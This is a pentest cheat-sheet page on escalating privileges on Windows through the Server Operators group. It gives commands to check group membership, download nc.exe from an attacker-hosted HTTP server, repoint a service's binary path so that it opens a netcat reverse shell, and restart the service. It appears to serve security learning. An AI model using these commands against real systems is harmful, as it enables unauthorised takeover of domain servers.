💥Cyb3rBook

Search

SearchSearch

SERVER OPERATORS

Apr 10, 20252 min read

PRIMARY CATEGORY → HIGH PRIVILEGED GROUPS
REFERENCES
Windows Privesc Server Operators GroupSee here

The Server Operators group is an Active Directory Security Group, also known as Privileged Groups

The main function of this group is basically to allow certain users to perform some administrative tasks without make them part of the Administrators Group or making them Domain Admins

Among the privileges enjoyed by members of this group, the following are highlighted

  • Start, Stop and Restart Services
  • Shutting down and Switching On Servers, including the Domain Controller
  • Manage Shared Resources
  • Backup and Restore Files in the Domain Controller

SEBackupPrivilege & SERestorePrivilege

  • Remote Access to the Domain Controller through Administration Tools

Local Privilege Escalation

Check Group Membership

Once a shell is obtained in the Remote Host as a non-privileged user, simply check if the user belongs to the Server Operators Group

whoami /groups
net user <USER>

If not, just check which system users belong to this group and try to pivot to one of them

Get-ADGroupMember -Identity "Server Operators"
List Available | Running Services

If Evil-WinRM is used to establish a connection to the target via WinRM, use the following tool-specific command to list the running services and the path of their associated binary

services

Choose a non-critical service to modify its binary path to the path of the netcat binary that the attacker will upload

Therefore, proceed as follows →

Upload a Netcat Binary
From the Attacker
python3 -m http.server <PORT>
From the Target
IWR -UseBasicParsing -Uri 'http://<TARGET>:<PORT>/nc.exe' -OutFile 'C:\Windows\Temp\nc.exe'
Modify the Binary Path of the Service

Modify the default binary path of the service to that of nc.exe by passing it the following arguments to send a reverse shell to the attacker machine

sc.exe config <SERVICE> binPath="C:\Windows\Temp\nc.exe -e powershell.exe <TARGET> <PORT>"
Stop and Start the Service

Once the binary path of the previous service has been modified, simply restart the service having previously set up a listening port on the attacker

From the Attacker
rlwrap -CaR nc -nlvp <PORT>
From the Target
sc.exe stop <SERVICE>
sc.exe start <SERVICE>

Graph View

Backlinks